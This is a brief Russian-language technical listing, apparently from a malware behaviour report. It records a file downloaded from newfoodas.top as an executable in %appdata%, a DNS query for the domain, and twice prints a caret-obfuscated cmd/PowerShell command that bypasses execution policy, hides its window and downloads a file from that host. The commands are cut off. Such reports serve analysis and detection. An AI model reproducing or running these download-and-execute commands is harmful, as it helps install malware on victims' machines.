Техническая информация
- http://newfoodas.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Power^sH^e^l^l.^exE^ -ex^eC^U^TiO^nP^o^licy ^BY^P^a^sS^ ^-n^oPR^oF^i^L^e -Win^dOws^t^Yle ^hID^dEn ^(^NEw-Ob^j^E^ct S^ysTem^.neT.w^EBC^lIeNT^).Down^lOAD^F^iLe('http://newfo...
- DNS ASK ne###odas.top
- '<SYSTEM32>\cmd.exe' /c "Power^sH^e^l^l.^exE^ -ex^eC^U^TiO^nP^o^licy ^BY^P^a^sS^ ^-n^oPR^oF^i^L^e -Win^dOws^t^Yle ^hID^dEn ^(^NEw-Ob^j^E^ct S^ysTem^.neT.w^EBC^lIeNT^).Down^lOAD^F^iLe('http://newfo...' (со скрытым окном)